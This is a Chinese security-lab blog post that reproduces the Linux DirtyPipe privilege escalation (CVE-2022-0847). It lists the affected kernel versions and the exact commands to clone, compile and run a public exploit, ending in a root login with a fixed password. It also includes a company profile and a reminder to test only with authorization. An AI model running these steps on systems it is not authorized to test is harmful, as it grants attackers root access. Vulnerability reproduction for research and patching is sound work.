漏洞复现 CVE-2022-0847 Linux DirtyPipe内核提权漏洞

admin 2022年7月25日17:56:32评论220 views字数 808阅读2分41秒阅读模式

0x01 漏洞描述

    Linux内核是操作系统的关键组件。它借助进程间通信和系统调用,在硬件级别上充当应用程序和数据处理之间的桥梁。CVE-2022-0847它是自5.8以来Linux内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。它类似于DirtyCOW(CVE-2016-5195),但更容易被利用。

漏洞复现 CVE-2022-0847 Linux DirtyPipe内核提权漏洞


0x02 漏洞复现

洞影响: 

Linux Kernel版本 5.8 <= Linux kernel < 5.16.11/5.15.25/5.10.102


1.使用kali2022系统,查看该内核版本,发现其版本为5.15.0,在影响范围内

uname -r

漏洞复现 CVE-2022-0847 Linux DirtyPipe内核提权漏洞


2.下载提权脚本,运行,提权成功

1.下载攻击脚本:git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
2.运行脚本,生成exp:./compile.sh
3.执行exp:./exploit
4.登录su root密码为:aaron

漏洞复现 CVE-2022-0847 Linux DirtyPipe内核提权漏洞

(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)


0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制:sm

审核:fjh

审核:Dog


原文始发于微信公众号(融云攻防实验室):漏洞复现 CVE-2022-0847 Linux DirtyPipe内核提权漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月25日17:56:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 CVE-2022-0847 Linux DirtyPipe内核提权漏洞http://cn-sec.com/archives/1199324.html

发表评论

匿名网友 填写信息